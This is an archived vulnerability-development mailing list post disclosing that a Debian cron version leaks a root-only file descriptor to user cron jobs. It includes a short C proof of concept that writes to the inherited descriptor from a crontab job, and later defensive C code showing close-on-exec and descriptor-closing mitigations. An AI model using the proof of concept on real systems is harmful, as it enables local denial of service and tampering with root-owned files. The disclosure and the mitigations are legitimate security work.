Vulnerability Development mailing list archives
[mtoseland () cableinet co uk: cron 3.0.pl1-63 doesn't close filehandles, compromises /var/run/crond.reboot from any user]
From: Matthew Toseland <mtoseland () CABLEINET CO UK>
Date: Mon, 26 Feb 2001 22:00:57 +0000
This appears to be Debian-specific. How to exploit, other than DoS attacks/quota bypass? What does /var/run/crond.reboot do? BTW, it is fixed now and appears to be Debian-specific. Ben Greenbaum said post to vuln-dev.
--- Begin Message ---
From: Matthew Toseland <mtoseland () cableinet co uk>
Date: Sun, 25 Feb 2001 01:49:39 +0000

Hi. I have discovered a problem with cron 3.0pl1-63 in woody. It does not close /var/run/crond.reboot when it forks and setuids. So any user who has a crontab can write to /var/run/crond.reboot, which is created with permissions 0000 and user/group root/root. This may or may not be exploitable for elevated privilege, but at the very least could be a quota violation or similar, leading to local DoS of the /var filesystem, hence disabling logging, mail, restarting of system daemons... on most systems. Note that this only works if there is a /var/run/crond.reboot.

Sample code:

    #include <stdio.h>
    #include <string.h>   /* strlen() */
    #include <unistd.h>

    int main(void)
    {
        /* fd 6 is the descriptor for /var/run/crond.reboot that the daemon
           leaves open when it forks and setuids; the job inherits it and can
           write to a 0000 root-owned file its own uid could never open */
        char *p = "hahahahahahahahahahahahahahahahahahahaha\n";
        int x = strlen(p);
        write(6, p, x - 1);
        close(6);
        return 0;
    }

Compile and insert into your crontab. DoS variant is obvious.

Is this a known problem? Is it fixed now? (my debian stopped updating because of local problems for a while). When will it be fixed? I will post to bugtraq in a week or so - this is your chance to fix it quickly before it becomes general knowledge - if it hasn't already become general knowledge among blackhats.
--- End Message ---
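The defect described in the forwarded message is a descriptor leak across fork/setuid: the daemon opens a root-only file, forks a job, drops privileges, and the job keeps the open descriptor. The program below is an added example, not cron's code and not Debian's fix; it shows the two standard mitigations (flagging descriptors FD_CLOEXEC early, or closing everything above stderr in the child before the privilege drop) and a self-check that reproduces the leak with a constructed temp file. It assumes Linux with /proc/self/fd, falling back to a bounded probe loop elsewhere.

```c
/* Added example for the cron fd-leak thread: descriptor hygiene for a
 * forking daemon. Not cron's code; /proc/self/fd is assumed on Linux. */
#define _XOPEN_SOURCE 700
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

/* Is fd a valid open descriptor in this process? */
int fd_is_open(int fd) { return fcntl(fd, F_GETFD) != -1; }

/* Does fd carry FD_CLOEXEC, i.e. will the kernel drop it on execve()? */
int fd_is_cloexec(int fd) {
    int flags = fcntl(fd, F_GETFD);
    return flags != -1 && (flags & FD_CLOEXEC) != 0;
}

/* Collect every open descriptor >= lowfd into out[] (at most cap entries).
 * Reads /proc/self/fd when present; otherwise probes a bounded range. */
static int list_fds_from(int lowfd, int *out, int cap) {
    int n = 0;
    DIR *d = opendir("/proc/self/fd");
    if (d) {
        int dfd = dirfd(d);               /* the directory stream's own fd */
        struct dirent *e;
        while ((e = readdir(d)) != NULL && n < cap) {
            if (e->d_name[0] == '.') continue;
            int fd = atoi(e->d_name);
            if (fd >= lowfd && fd != dfd) out[n++] = fd;
        }
        closedir(d);
        return n;
    }
    long lim = sysconf(_SC_OPEN_MAX);
    if (lim < 0 || lim > 65536) lim = 65536;   /* keep the probe loop bounded */
    for (int fd = lowfd; fd < lim && n < cap; fd++)
        if (fd_is_open(fd)) out[n++] = fd;
    return n;
}

/* Mitigation 1: flag every descriptor >= lowfd close-on-exec. The parent
 * keeps using them; an exec'ed job never sees them. Returns count flagged. */
int mark_cloexec_from(int lowfd) {
    int fds[1024], done = 0;
    int n = list_fds_from(lowfd, fds, 1024);
    for (int i = 0; i < n; i++) {
        int flags = fcntl(fds[i], F_GETFD);
        if (flags != -1 && fcntl(fds[i], F_SETFD, flags | FD_CLOEXEC) == 0) done++;
    }
    return done;
}

/* Mitigation 2: close every descriptor >= lowfd. Call in the child between
 * fork() and setuid()/exec() so the job starts with only fds 0-2. */
int close_from(int lowfd) {
    int fds[1024], done = 0;
    int n = list_fds_from(lowfd, fds, 1024);
    for (int i = 0; i < n; i++)
        if (close(fds[i]) == 0) done++;
    return done;
}

/* Reproduce the daemon pattern: open a private file (constructed temp file
 * standing in for /var/run/crond.reboot), fork, and ask the child whether
 * the descriptor survived. Returns 1 if the child still holds it (the leak),
 * 0 if close_from() removed it, -1 on error. */
int child_sees_fd(int use_fix) {
    char path[] = "/tmp/fdleak-demo-XXXXXX";
    int fd = mkstemp(path);
    if (fd < 0) return -1;
    unlink(path);
    pid_t pid = fork();
    if (pid < 0) { close(fd); return -1; }
    if (pid == 0) {
        if (use_fix) close_from(3);
        _exit(fd_is_open(fd) ? 1 : 0);
    }
    int status = 0;
    waitpid(pid, &status, 0);
    close(fd);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Self-check for mitigation 1: a freshly opened fd lacks FD_CLOEXEC, gains it
 * after mark_cloexec_from(), and is gone after close_from(). Returns 1 on success. */
int cloexec_roundtrip(void) {
    char path[] = "/tmp/fdleak-demo-XXXXXX";
    int fd = mkstemp(path);
    if (fd < 0) return 0;
    unlink(path);
    int ok = !fd_is_cloexec(fd);
    ok = ok && mark_cloexec_from(fd) >= 1 && fd_is_cloexec(fd);
    ok = ok && close_from(fd) >= 1 && !fd_is_open(fd);
    return ok ? 1 : 0;
}

int main(void) {
    printf("child sees inherited fd, no fix:        %d\n", child_sees_fd(0));
    printf("child sees inherited fd, close_from(3): %d\n", child_sees_fd(1));
    printf("cloexec round trip ok:                  %d\n", cloexec_roundtrip());
    return 0;
}
```

Opening the file with O_CLOEXEC in the first place is the simplest form of mitigation 1; the scan in mark_cloexec_from() is for descriptors a daemon did not open itself (inherited from its parent, or created by a library). The same list_fds_from() scan, run from inside a spawned job, is also how an auditor can check whether a daemon on a given system still leaks anything above fd 2.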